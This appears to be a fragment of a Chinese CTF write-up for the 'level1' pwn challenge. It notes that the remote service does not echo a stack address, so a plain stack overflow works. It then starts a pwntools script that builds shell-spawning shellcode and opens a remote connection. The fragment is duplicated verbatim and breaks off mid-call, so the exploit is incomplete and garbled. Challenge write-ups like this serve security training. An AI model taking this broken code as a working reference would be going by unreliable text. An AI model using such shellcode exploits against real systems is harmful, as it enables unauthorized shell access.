和原题的差别在于,远程不回显栈地址。直接常规栈溢出即可
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import *
elf = ELF("./level1")
shellcode = asm(shellcraft.sh())
io = remote(
和原题的差别在于,远程不回显栈地址。直接常规栈溢出即可
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import *
elf = ELF("./level1")
shellcode = asm(shellcraft.sh())
io = remote(